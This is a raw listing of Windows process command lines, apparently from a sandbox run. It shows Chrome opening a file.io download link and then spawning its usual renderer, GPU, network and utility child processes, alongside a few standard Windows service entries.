"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://file.io/h5Uhqk3g8uxH
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd9901cc40,0x7ffd9901cc4c,0x7ffd9901cc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1760,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=1756 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1744,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=1924 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2160,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=2172 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3056,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3088 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3076,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3268 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4420,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3532 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4800,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4796 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=4264,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5008 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=5156,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5124 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=5296,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5272 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=5452,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5444 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=5648,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5640 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4992,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5788 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=6048,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=6052 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=6228,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=6220 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=6352,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=6368 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=6232,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=6560 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --field-trial-handle=6700,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=6736 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=6864,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=6824 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=6720,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=7000 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --field-trial-handle=7144,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=7128 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --field-trial-handle=7252,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=7284 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --field-trial-handle=7260,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=7408 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --field-trial-handle=6044,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=7140 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --field-trial-handle=7664,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=7684 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --field-trial-handle=5612,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=7444 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --field-trial-handle=8040,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=7796 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --field-trial-handle=8188,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=8176 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --field-trial-handle=8312,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=8328 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --field-trial-handle=8500,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=8028 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --field-trial-handle=7244,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=8516 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --field-trial-handle=8768,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=8636 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --field-trial-handle=6704,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=8752 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --field-trial-handle=9024,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=9040 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --field-trial-handle=9172,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=9208 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --field-trial-handle=9356,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=8928 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --field-trial-handle=3492,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=9532 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --field-trial-handle=9796,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=9800 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --field-trial-handle=10124,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=10140 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --field-trial-handle=5780,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5772 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --field-trial-handle=10008,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=10228 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --field-trial-handle=10204,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=10372 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --field-trial-handle=10520,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=10524 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --field-trial-handle=10220,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=10648 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --field-trial-handle=3356,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=10196 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --field-trial-handle=4840,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=10548 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --field-trial-handle=10932,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=10672 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --field-trial-handle=10164,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=11228 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --field-trial-handle=3716,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=11312 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --field-trial-handle=11464,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=11496 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --field-trial-handle=11472,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=11624 /prefetch:1
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --field-trial-handle=11304,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=11528 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --field-trial-handle=11340,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=10976 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --field-trial-handle=11776,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=11504 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --field-trial-handle=4876,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=12052 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --field-trial-handle=4852,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=11608 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --field-trial-handle=4864,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=12076 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --field-trial-handle=4928,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5864 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --field-trial-handle=4868,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4748 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --field-trial-handle=4796,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=12308 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --field-trial-handle=4832,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=12336 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --field-trial-handle=10404,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=12548 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --field-trial-handle=11772,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=12572 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=11940,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=12452 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --field-trial-handle=11440,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=11356 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=10792,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=10440 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=10848,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=10872 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --field-trial-handle=7592,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=7580 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --field-trial-handle=12704,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=12784 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=12556,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=12708 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=12692,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=7596 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
